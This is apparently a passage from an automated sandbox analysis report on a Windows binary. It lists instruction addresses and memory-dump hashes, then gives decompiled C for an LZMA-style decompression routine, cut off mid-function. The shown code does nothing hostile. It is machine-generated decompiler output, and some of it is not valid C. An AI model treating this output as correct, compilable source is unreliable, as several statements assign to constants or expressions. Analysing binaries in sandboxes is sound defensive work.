                                                0x004065db
                                                0x004065db
                                                0x004065de
                                                0x004065e5
                                                0x004065ea
                                                0x00000000
                                                0x00000000
                                                0x00406678
                                                0x00406678
                                                0x0040667c
                                                0x00406a1a
                                                0x00000000
                                                0x00406a1a
                                                0x00406682
                                                0x00406685
                                                0x00406688
                                                0x0040668c
                                                0x0040668f
                                                0x00406695
                                                0x00406697
                                                0x00406697
                                                0x00406697
                                                0x0040669a
                                                0x0040669d
                                                0x00000000
                                                0x00000000
                                                0x0040626d
                                                0x0040626d
                                                0x00406271
                                                0x004069de
                                                0x00000000
                                                0x004069de
                                                0x00406277
                                                0x0040627a
                                                0x0040627d
                                                0x00406281
                                                0x00406284
                                                0x0040628a
                                                0x0040628c
                                                0x0040628c
                                                0x0040628c
                                                0x0040628f
                                                0x00406292
                                                0x00406292
                                                0x00406295
                                                0x00406298
                                                0x00000000
                                                0x00000000
                                                0x0040629e
                                                0x004062a4
                                                0x00000000
                                                0x00000000
                                                0x004062aa
                                                0x004062aa
                                                0x004062ae
                                                0x004062b1
                                                0x004062b4
                                                0x004062b7
                                                0x004062ba
                                                0x004062bb
                                                0x004062be
                                                0x004062c0
                                                0x004062c6
                                                0x004062c9
                                                0x004062cc
                                                0x004062cf
                                                0x004062d2
                                                0x004062d5
                                                0x004062d8
                                                0x004062f4
                                                0x004062f7
                                                0x004062fa
                                                0x004062fd
                                                0x00406304
                                                0x00406308
                                                0x0040630a
                                                0x0040630e
                                                0x004062da
                                                0x004062da
                                                0x004062de
                                                0x004062e6
                                                0x004062eb
                                                0x004062ed
                                                0x004062ef
                                                0x004062ef
                                                0x00406311
                                                0x00406318
                                                0x0040631b
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406321
                                                0x00000000
                                                0x00406326
                                                0x00406326
                                                0x0040632a
                                                0x004069ea
                                                0x00000000
                                                0x004069ea
                                                0x00406330
                                                0x00406333
                                                0x00406336
                                                0x0040633a
                                                0x0040633d
                                                0x00406343
                                                0x00406345
                                                0x00406345
                                                0x00406345
                                                0x00406348
                                                0x0040634b
                                                0x0040634b
                                                0x0040634b
                                                0x00406351
                                                0x00000000
                                                0x00000000
                                                0x00406353
                                                0x00406356
                                                0x00406359
                                                0x0040635c
                                                0x0040635f
                                                0x00406362
                                                0x00406365
                                                0x00406368
                                                0x0040636b
                                                0x0040636e
                                                0x00406371
                                                0x00406389
                                                0x0040638c
                                                0x0040638f
                                                0x00406392
                                                0x00406392
                                                0x00406395
                                                0x00406399
                                                0x0040639b
                                                0x00406373
                                                0x00406373
                                                0x0040637b
                                                0x00406380
                                                0x00406382
                                                0x00406384
                                                0x00406384
                                                0x0040639e
                                                0x004063a5
                                                0x004063a8
                                                0x00000000
                                                0x004063aa
                                                0x00000000
                                                0x004063aa
                                                0x004063a8
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x004063af
                                                0x00000000
                                                0x00000000
                                                0x004063ea
                                                0x004063ea
                                                0x004063ee
                                                0x004069f6
                                                0x00000000
                                                0x004069f6
                                                0x004063f4
                                                0x004063f7
                                                0x004063fa
                                                0x004063fe
                                                0x00406401
                                                0x00406407
                                                0x00406409
                                                0x00406409
                                                0x00406409
                                                0x0040640c
                                                0x0040640f
                                                0x0040640f
                                                0x00406415
                                                0x004063b3
                                                0x004063b3
                                                0x004063b6
                                                0x00000000
                                                0x004063b6
                                                0x00406417
                                                0x00406417
                                                0x0040641a
                                                0x0040641d
                                                0x00406420
                                                0x00406423
                                                0x00406426
                                                0x00406429
                                                0x0040642c
                                                0x0040642f
                                                0x00406432
                                                0x00406435
                                                0x0040644d
                                                0x00406450
                                                0x00406453
                                                0x00406456
                                                0x00406456
                                                0x00406459
                                                0x0040645d
                                                0x0040645f
                                                0x00406437
                                                0x00406437
                                                0x0040643f
                                                0x00406444
                                                0x00406446
                                                0x00406448
                                                0x00406448
                                                0x00406462
                                                0x00406469
                                                0x0040646c
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x0040646e
                                                0x00000000
                                                0x004066fb
                                                0x004066fb
                                                0x004066ff
                                                0x00406a26
                                                0x00000000
                                                0x00406a26
                                                0x00406705
                                                0x00406708
                                                0x0040670b
                                                0x0040670f
                                                0x00406712
                                                0x00406718
                                                0x0040671a
                                                0x0040671a
                                                0x0040671a
                                                0x0040671d
                                                0x00000000
                                                0x00000000
                                                0x004064cb
                                                0x004064cb
                                                0x004064ce
                                                0x00406840
                                                0x00406840
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004068c7
                                                0x004068cb
                                                0x004068e9
                                                0x004068e9
                                                0x004068e9
                                                0x004068f0
                                                0x004068f7
                                                0x00000000
                                                0x004068f7
                                                0x004068cd
                                                0x004068d0
                                                0x004068d3
                                                0x004068d6
                                                0x004068dd
                                                0x00000000
                                                0x00000000
                                                0x004069b8
                                                0x004069bb
                                                0x004068bc
                                                0x004068bc
                                                0x00000000
                                                0x00000000
                                                0x004065f2
                                                0x004065f4
                                                0x004065fb
                                                0x004065fc
                                                0x004065fe
                                                0x00406601
                                                0x00000000
                                                0x00000000
                                                0x00406609
                                                0x0040660c
                                                0x0040660f
                                                0x00406611
                                                0x00406613
                                                0x00406613
                                                0x00406614
                                                0x00406617
                                                0x0040661e
                                                0x00406621
                                                0x0040662f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406914
                                                0x00406914
                                                0x00406918
                                                0x00406a50
                                                0x00000000
                                                0x00406a50
                                                0x0040691e
                                                0x00406921
                                                0x00406924
                                                0x00406928
                                                0x0040692b
                                                0x00406931
                                                0x00406933
                                                0x00406933
                                                0x00406933
                                                0x00406936
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00406939
                                                0x00000000
                                                0x00000000
                                                0x00406637
                                                0x0040663a
                                                0x00406670
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a0
                                                0x004067a3
                                                0x004067a3
                                                0x004067a6
                                                0x004067a8
                                                0x00406a32
                                                0x00000000
                                                0x00406a32
                                                0x004067ae
                                                0x004067b1
                                                0x00000000
                                                0x00000000
                                                0x004067b7
                                                0x004067bb
                                                0x004067be
                                                0x004067be
                                                0x004067be
                                                0x00000000
                                                0x004067be
                                                0x0040663c
                                                0x0040663e
                                                0x00406640
                                                0x00406642
                                                0x00406645
                                                0x00406646
                                                0x00406648
                                                0x0040664a
                                                0x0040664d
                                                0x00406650
                                                0x00406666
                                                0x0040666b
                                                0x004066a3
                                                0x004066a3
                                                0x004066a7
                                                0x004066d3
                                                0x004066d5
                                                0x004066dc
                                                0x004066df
                                                0x004066e2
                                                0x004066e2
                                                0x004066e7
                                                0x004066e7
                                                0x004066e9
                                                0x004066ec
                                                0x004066f3
                                                0x004066f6
                                                0x00406723
                                                0x00406723
                                                0x00406726
                                                0x00406729
                                                0x0040679d
                                                0x0040679d
                                                0x0040679d
                                                0x00000000
                                                0x0040679d
                                                0x0040672b
                                                0x00406731
                                                0x00406734
                                                0x00406737
                                                0x0040673a
                                                0x0040673d
                                                0x00406740
                                                0x00406743
                                                0x00406746
                                                0x00406749
                                                0x0040674c
                                                0x00406765
                                                0x00406767
                                                0x0040676a
                                                0x0040676b
                                                0x0040676e
                                                0x00406770
                                                0x00406773
                                                0x00406775
                                                0x00406777
                                                0x0040677a
                                                0x0040677c
                                                0x0040677f
                                                0x00406783
                                                0x00406785
                                                0x00406785
                                                0x00406786
                                                0x00406789
                                                0x0040678c
                                                0x0040674e
                                                0x0040674e
                                                0x00406756
                                                0x0040675b
                                                0x0040675d
                                                0x00406760
                                                0x00406760
                                                0x0040678f
                                                0x00406796
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00406720
                                                0x00000000
                                                0x00406798
                                                0x00000000
                                                0x00406798
                                                0x00406796
                                                0x004066a9
                                                0x004066ac
                                                0x004066ae
                                                0x004066b1
                                                0x004066b4
                                                0x004066b7
                                                0x004066b9
                                                0x004066bc
                                                0x004066bf
                                                0x004066bf
                                                0x004066c2
                                                0x004066c2
                                                0x004066c5
                                                0x004066cc
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x004066a0
                                                0x00000000
                                                0x004066ce
                                                0x00000000
                                                0x004066ce
                                                0x004066cc
                                                0x00406652
                                                0x00406655
                                                0x00406657
                                                0x0040665a
                                                0x00000000
                                                0x00000000
                                                0x004063b9
                                                0x004063b9
                                                0x004063bd
                                                0x00406a02
                                                0x00000000
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                                • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                                • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 98%
                                                			E00406520() {
                                                				unsigned short _t532;
                                                				signed int _t533;
                                                				void _t534;
                                                				void* _t535;
                                                				signed int _t536;
                                                				signed int _t565;
                                                				signed int _t568;
                                                				signed int _t589;
                                                				signed int* _t606;
                                                				void* _t613;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					if( *(_t613 - 0x40) != 0) {
                                                						L89:
                                                						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                						L69:
                                                						_t606 =  *(_t613 - 0x58);
                                                						 *(_t613 - 0x84) = 0x12;
                                                						L132:
                                                						 *(_t613 - 0x54) = _t606;
                                                						L133:
                                                						_t532 =  *_t606;
                                                						_t589 = _t532 & 0x0000ffff;
                                                						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                						if( *(_t613 - 0xc) >= _t565) {
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                							 *(_t613 - 0x40) = 1;
                                                							_t533 = _t532 - (_t532 >> 5);
                                                							 *_t606 = _t533;
                                                						} else {
                                                							 *(_t613 - 0x10) = _t565;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                						}
                                                						if( *(_t613 - 0x10) >= 0x1000000) {
                                                							L139:
                                                							_t534 =  *(_t613 - 0x84);
                                                							L140:
                                                							 *(_t613 - 0x88) = _t534;
                                                							goto L1;
                                                						} else {
                                                							L137:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 5;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							goto L139;
                                                						}
                                                					} else {
                                                						if( *(__ebp - 0x60) == 0) {
                                                							L171:
                                                							_t536 = _t535 | 0xffffffff;
                                                							L172:
                                                							return _t536;
                                                						}
                                                						__eax = 0;
                                                						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                						0 | _t258 = _t258 + _t258 + 9;
                                                						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                						L75:
                                                						if( *(__ebp - 0x64) == 0) {
                                                							 *(__ebp - 0x88) = 0x1b;
                                                							L170:
                                                							_t568 = 0x22;
                                                							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                							_t536 = 0;
                                                							goto L172;
                                                						}
                                                						__eax =  *(__ebp - 0x14);
                                                						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                						if(__eax >=  *(__ebp - 0x74)) {
                                                							__eax = __eax +  *(__ebp - 0x74);
                                                						}
                                                						__edx =  *(__ebp - 8);
                                                						__cl =  *(__eax + __edx);
                                                						__eax =  *(__ebp - 0x14);
                                                						 *(__ebp - 0x5c) = __cl;
                                                						 *(__eax + __edx) = __cl;
                                                						__eax = __eax + 1;
                                                						__edx = 0;
                                                						_t274 = __eax %  *(__ebp - 0x74);
                                                						__eax = __eax /  *(__ebp - 0x74);
                                                						__edx = _t274;
                                                						__eax =  *(__ebp - 0x68);
                                                						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                						_t283 = __ebp - 0x64;
                                                						 *_t283 =  *(__ebp - 0x64) - 1;
                                                						 *( *(__ebp - 0x68)) = __cl;
                                                						L79:
                                                						 *(__ebp - 0x14) = __edx;
                                                						L80:
                                                						 *(__ebp - 0x88) = 2;
                                                					}
                                                					L1:
                                                					_t535 =  *(_t613 - 0x88);
                                                					if(_t535 > 0x1c) {
                                                						goto L171;
                                                					}
                                                					switch( *((intOrPtr*)(_t535 * 4 +  &M00406A77))) {
                                                						case 0:
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t535 =  *( *(_t613 - 0x70));
                                                							if(_t535 > 0xe1) {
                                                								goto L171;
                                                							}
                                                							_t539 = _t535 & 0x000000ff;
                                                							_push(0x2d);
                                                							asm("cdq");
                                                							_pop(_t570);
                                                							_push(9);
                                                							_pop(_t571);
                                                							_t609 = _t539 / _t570;
                                                							_t541 = _t539 % _t570 & 0x000000ff;
                                                							asm("cdq");
                                                							_t604 = _t541 % _t571 & 0x000000ff;
                                                							 *(_t613 - 0x3c) = _t604;
                                                							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                								L10:
                                                								if(_t612 == 0) {
                                                									L12:
                                                									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                									goto L15;
                                                								} else {
                                                									goto L11;
                                                								}
                                                								do {
                                                									L11:
                                                									_t612 = _t612 - 1;
                                                									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                								} while (_t612 != 0);
                                                								goto L12;
                                                							}
                                                							if( *(_t613 - 4) != 0) {
                                                								GlobalFree( *(_t613 - 4));
                                                							}
                                                							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                							 *(_t613 - 4) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                								goto L10;
                                                							}
                                                						case 1:
                                                							L13:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 1;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                							_t45 = _t613 - 0x48;
                                                							 *_t45 =  *(_t613 - 0x48) + 1;
                                                							__eflags =  *_t45;
                                                							L15:
                                                							if( *(_t613 - 0x48) < 4) {
                                                								goto L13;
                                                							}
                                                							_t547 =  *(_t613 - 0x40);
                                                							if(_t547 ==  *(_t613 - 0x74)) {
                                                								L20:
                                                								 *(_t613 - 0x48) = 5;
                                                								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                								goto L23;
                                                							}
                                                							 *(_t613 - 0x74) = _t547;
                                                							if( *(_t613 - 8) != 0) {
                                                								GlobalFree( *(_t613 - 8)); // executed
                                                							}
                                                							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                							 *(_t613 - 8) = _t535;
                                                							if(_t535 == 0) {
                                                								goto L171;
                                                							} else {
                                                								goto L20;
                                                							}
                                                						case 2:
                                                							L24:
                                                							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                							 *(_t613 - 0x84) = 6;
                                                							 *(_t613 - 0x4c) = _t554;
                                                							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                							goto L132;
                                                						case 3:
                                                							L21:
                                                							__eflags =  *(_t613 - 0x6c);
                                                							if( *(_t613 - 0x6c) == 0) {
                                                								 *(_t613 - 0x88) = 3;
                                                								goto L170;
                                                							}
                                                							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                							_t67 = _t613 - 0x70;
                                                							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                							__eflags =  *_t67;
                                                							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                							L23:
                                                							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                							if( *(_t613 - 0x48) != 0) {
                                                								goto L21;
                                                							}
                                                							goto L24;
                                                						case 4:
                                                							goto L133;
                                                						case 5:
                                                							goto L137;
                                                						case 6:
                                                							__edx = 0;
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x34) = 1;
                                                								 *(__ebp - 0x84) = 7;
                                                								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                							__esi =  *(__ebp - 0x60);
                                                							__cl = 8;
                                                							__cl = 8 -  *(__ebp - 0x3c);
                                                							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                							__ecx =  *(__ebp - 0x3c);
                                                							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                							__ecx =  *(__ebp - 4);
                                                							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                							__eflags =  *(__ebp - 0x38) - 4;
                                                							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                							if( *(__ebp - 0x38) >= 4) {
                                                								__eflags =  *(__ebp - 0x38) - 0xa;
                                                								if( *(__ebp - 0x38) >= 0xa) {
                                                									_t98 = __ebp - 0x38;
                                                									 *_t98 =  *(__ebp - 0x38) - 6;
                                                									__eflags =  *_t98;
                                                								} else {
                                                									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                								}
                                                							} else {
                                                								 *(__ebp - 0x38) = 0;
                                                							}
                                                							__eflags =  *(__ebp - 0x34) - __edx;
                                                							if( *(__ebp - 0x34) == __edx) {
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								goto L61;
                                                							} else {
                                                								__eax =  *(__ebp - 0x14);
                                                								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                								__eflags = __eax -  *(__ebp - 0x74);
                                                								if(__eax >=  *(__ebp - 0x74)) {
                                                									__eax = __eax +  *(__ebp - 0x74);
                                                									__eflags = __eax;
                                                								}
                                                								__ecx =  *(__ebp - 8);
                                                								__ebx = 0;
                                                								__ebx = 1;
                                                								__al =  *((intOrPtr*)(__eax + __ecx));
                                                								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                								goto L41;
                                                							}
                                                						case 7:
                                                							__eflags =  *(__ebp - 0x40) - 1;
                                                							if( *(__ebp - 0x40) != 1) {
                                                								__eax =  *(__ebp - 0x24);
                                                								 *(__ebp - 0x80) = 0x16;
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x28);
                                                								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                								__eax =  *(__ebp - 0x2c);
                                                								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                								__eax = 0;
                                                								__eflags =  *(__ebp - 0x38) - 7;
                                                								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                								__al = __al & 0x000000fd;
                                                								__eax = (__eflags >= 0) - 1 + 0xa;
                                                								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                								__eax =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 4) + 0x664;
                                                								__eflags = __eax;
                                                								 *(__ebp - 0x58) = __eax;
                                                								goto L69;
                                                							}
                                                							__eax =  *(__ebp - 4);
                                                							__ecx =  *(__ebp - 0x38);
                                                							 *(__ebp - 0x84) = 8;
                                                							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                							goto L132;
                                                						case 8:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xa;
                                                								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                							} else {
                                                								__eax =  *(__ebp - 0x38);
                                                								__ecx =  *(__ebp - 4);
                                                								__eax =  *(__ebp - 0x38) + 0xf;
                                                								 *(__ebp - 0x84) = 9;
                                                								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                							}
                                                							goto L132;
                                                						case 9:
                                                							goto L0;
                                                						case 0xa:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__eax =  *(__ebp - 4);
                                                								__ecx =  *(__ebp - 0x38);
                                                								 *(__ebp - 0x84) = 0xb;
                                                								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                								goto L132;
                                                							}
                                                							__eax =  *(__ebp - 0x28);
                                                							goto L88;
                                                						case 0xb:
                                                							__eflags =  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x40) != 0) {
                                                								__ecx =  *(__ebp - 0x24);
                                                								__eax =  *(__ebp - 0x20);
                                                								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                							} else {
                                                								__eax =  *(__ebp - 0x24);
                                                							}
                                                							__ecx =  *(__ebp - 0x28);
                                                							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                							L88:
                                                							__ecx =  *(__ebp - 0x2c);
                                                							 *(__ebp - 0x2c) = __eax;
                                                							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                							goto L89;
                                                						case 0xc:
                                                							L99:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xc;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t334 = __ebp - 0x70;
                                                							 *_t334 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t334;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							__eax =  *(__ebp - 0x2c);
                                                							goto L101;
                                                						case 0xd:
                                                							L37:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xd;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							_t122 = __ebp - 0x70;
                                                							 *_t122 =  *(__ebp - 0x70) + 1;
                                                							__eflags =  *_t122;
                                                							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							L39:
                                                							__eax =  *(__ebp - 0x40);
                                                							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                								goto L48;
                                                							}
                                                							__eflags = __ebx - 0x100;
                                                							if(__ebx >= 0x100) {
                                                								goto L54;
                                                							}
                                                							L41:
                                                							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                							__ecx =  *(__ebp - 0x58);
                                                							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                							 *(__ebp - 0x48) = __eax;
                                                							__eax = __eax + 1;
                                                							__eax = __eax << 8;
                                                							__eax = __eax + __ebx;
                                                							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                							__ax =  *__esi;
                                                							 *(__ebp - 0x54) = __esi;
                                                							__edx = __ax & 0x0000ffff;
                                                							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                							__eflags =  *(__ebp - 0xc) - __ecx;
                                                							if( *(__ebp - 0xc) >= __ecx) {
                                                								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                								__cx = __ax;
                                                								 *(__ebp - 0x40) = 1;
                                                								__cx = __ax >> 5;
                                                								__eflags = __eax;
                                                								__ebx = __ebx + __ebx + 1;
                                                								 *__esi = __ax;
                                                							} else {
                                                								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                								 *(__ebp - 0x10) = __ecx;
                                                								0x800 = 0x800 - __edx;
                                                								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                								__ebx = __ebx + __ebx;
                                                								 *__esi = __cx;
                                                							}
                                                							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                							 *(__ebp - 0x44) = __ebx;
                                                							if( *(__ebp - 0x10) >= 0x1000000) {
                                                								goto L39;
                                                							} else {
                                                								goto L37;
                                                							}
                                                						case 0xe:
                                                							L46:
                                                							__eflags =  *(__ebp - 0x6c);
                                                							if( *(__ebp - 0x6c) == 0) {
                                                								 *(__ebp - 0x88) = 0xe;
                                                								goto L170;
                                                							}
                                                							__ecx =  *(__ebp - 0x70);
                                                							__eax =  *(__ebp - 0xc);
                                                							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
